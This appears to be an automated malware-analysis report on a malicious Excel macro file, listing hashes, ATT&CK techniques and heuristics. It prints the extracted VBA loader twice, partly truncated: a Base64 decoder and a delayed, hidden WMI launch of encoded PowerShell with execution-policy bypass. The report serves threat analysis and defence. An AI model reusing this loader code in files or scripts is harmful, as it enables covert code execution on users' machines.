Office (OOXML) malware analysis — malicious · 52079d04786c7783

MALICIOUS

Office (OOXML)

41.5 KB Created: 2021-06-22 12:43:05 UTC Authoring application: Microsoft Excel 16.0300

MD5: 119c95ee5cf5cf3e9730b13c9812fb09 SHA-1: f89b6cd5b140958ddc254b7795038d3e6389a877 SHA-256: 52079d04786c778343e36a7a986e3d33d53c2f5413e9ee1e9ae888624715983a

160 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File

The OOXML file contains VBA macros that reference PowerShell and cmd.exe. The GetObject call and the presence of a VBA project suggest that the macros are designed to execute commands or download additional content. The Base64 decoding function indicates potential obfuscation of malicious code or URLs.

Heuristics 4

VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA
GetObject call high OLE_VBA_GETOBJ

GetObject call
cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas
381a66a069c006e6f7b61ec561ee3425261803afb20ae9d7658482fc064306bf vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 34430 bytes

Filename	Kind	Source	Size
`macros.bas` `381a66a069c006e6f7b61ec561ee3425261803afb20ae9d7658482fc064306bf`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	34430 bytes
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Const clOneMask = 16515072 Private Const clTwoMask = 258048 Private Const clThreeMask = 4032 Private Const clFourMask = 63 Private Const clHighMask = 16711680 Private Const clMidMask = 65280 Private Const clLowMask = 255 Private Const cl2Exp18 = 262144 Private Const cl2Exp12 = 4096 Private Const cl2Exp6 = 64 Private Const cl2Exp8 = 256 Private Const cl2Exp16 = 65536 Public Function Decode64(sString As String) As String Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String Dim lTemp As Long sString = Replace(sString, vbCr, vbNullString) sString = Replace(sString, vbLf, vbNullString) lTemp = Len(sString) Mod 4 If lTemp Then Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.") End If If InStrRev(sString, "==") Then iPad = 2 ElseIf InStrRev(sString, "=") Then iPad = 1 End If For lTemp = 0 To 255 Select Case lTemp Case 65 To 90 bTrans(lTemp) = lTemp - 65 Case 97 To 122 bTrans(lTemp) = lTemp - 71 Case 48 To 57 bTrans(lTemp) = lTemp + 4 Case 43 bTrans(lTemp) = 62 Case 47 bTrans(lTemp) = 63 End Select Next lTemp For lTemp = 0 To 63 lPowers6(lTemp) = lTemp * cl2Exp6 lPowers12(lTemp) = lTemp * cl2Exp12 lPowers18(lTemp) = lTemp * cl2Exp18 Next lTemp bIn = StrConv(sString, vbFromUnicode) ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1) For lChar = 0 To UBound(bIn) Step 4 lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _ lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3)) lTemp = lQuad And clHighMask bOut(lPos) = lTemp \ cl2Exp16 lTemp = lQuad And clMidMask bOut(lPos + 1) = lTemp \ cl2Exp8 bOut(lPos + 2) = lQuad And clLowMask lPos = lPos + 3 Next lChar sOut = StrConv(bOut, vbUnicode) If iPad Then sOut = Left$(sOut, Len(sOut) - iPad) Decode64 = sOut End Function Public Sub Pause(sngSecs As Single) Dim sngEnd As Single sngEnd = Timer + sngSecs While Timer < sngEnd DoEvents Wend End Sub Private Function VerifyPath() Dim fileStr As String VerifyPath = Decode64(WFW_Status_NWXXX()) End Function Private Sub JePyNe() Pause (38) Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = 0 Dim strstr As String strstr = "cmd.exe /c ""powershell -ExecutionPolicy BypasS -ENC " + StrConv(Decode64(WFW_Status_NWXXX()), vbFromUnicode) + """" Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") objProcess.Create strstr, Null, objConfig, intProcessID End ... (truncated)
`vbaProject_00.bin` `d1f30ce9ab4b0102c7fd7d71f7551ce819e982f33aea7417851fbbbb66e1f696`	vba-project	OOXML VBA project: xl/vbaProject.bin	11264 bytes

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Const clOneMask = 16515072   
Private Const clTwoMask = 258048     
Private Const clThreeMask = 4032     
Private Const clFourMask = 63        
Private Const clHighMask = 16711680  
Private Const clMidMask = 65280      
Private Const clLowMask = 255        
Private Const cl2Exp18 = 262144      
Private Const cl2Exp12 = 4096        
Private Const cl2Exp6 = 64           
Private Const cl2Exp8 = 256          
Private Const cl2Exp16 = 65536       

Public Function Decode64(sString As String) As String                                                    
	Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long    
	Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String 
	Dim lTemp As Long                                                                                      
	sString = Replace(sString, vbCr, vbNullString)                                                         
	sString = Replace(sString, vbLf, vbNullString)                                                         
	lTemp = Len(sString) Mod 4                                                                             
	If lTemp Then                                                                                          
		Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")                   
	End If                                                                                                 
	If InStrRev(sString, "==") Then                                                                      
		iPad = 2                                                                                             
	ElseIf InStrRev(sString, "=") Then                                                                   
		iPad = 1                                                                                             
	End If                                                                                                 
	For lTemp = 0 To 255              
		Select Case lTemp
			Case 65 To 90
				bTrans(lTemp) = lTemp - 65 
			Case 97 To 122
				bTrans(lTemp) = lTemp - 71
			Case 48 To 57
				bTrans(lTemp) = lTemp + 4
			Case 43
				bTrans(lTemp) = 62
			Case 47
				bTrans(lTemp) = 63
		End Select
	Next lTemp
	For lTemp = 0 To 63
		lPowers6(lTemp) = lTemp * cl2Exp6
		lPowers12(lTemp) = lTemp * cl2Exp12
		lPowers18(lTemp) = lTemp * cl2Exp18
	Next lTemp
	bIn = StrConv(sString, vbFromUnicode) 
	ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
	For lChar = 0 To UBound(bIn) Step 4
		lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
				lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3)) 
		lTemp = lQuad And clHighMask
		bOut(lPos) = lTemp \ cl2Exp16
		lTemp = lQuad And clMidMask
		bOut(lPos + 1) = lTemp \ cl2Exp8
		bOut(lPos + 2) = lQuad And clLowMask
		lPos = lPos + 3
	Next lChar
	sOut = StrConv(bOut, vbUnicode)    
	If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
	Decode64 = sOut
End Function


Public Sub Pause(sngSecs As Single)
	Dim sngEnd As Single
	sngEnd = Timer + sngSecs
	While Timer < sngEnd
		DoEvents
	Wend
End Sub


Private Function VerifyPath()
	Dim fileStr As String
	VerifyPath = Decode64(WFW_Status_NWXXX())
End Function

Private Sub JePyNe()
	Pause (38)
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set objStartup = objWMIService.Get("Win32_ProcessStartup")
	Set objConfig = objStartup.SpawnInstance_
	objConfig.ShowWindow = 0
	Dim strstr As String
	strstr = "cmd.exe /c ""powershell -ExecutionPolicy BypasS -ENC " + StrConv(Decode64(WFW_Status_NWXXX()), vbFromUnicode) + """"
	Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
	objProcess.Create strstr, Null, objConfig, intProcessID
End 
... (truncated)

vbaProject_00.bin
d1f30ce9ab4b0102c7fd7d71f7551ce819e982f33aea7417851fbbbb66e1f696 vba-project OOXML VBA project: xl/vbaProject.bin 11264 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.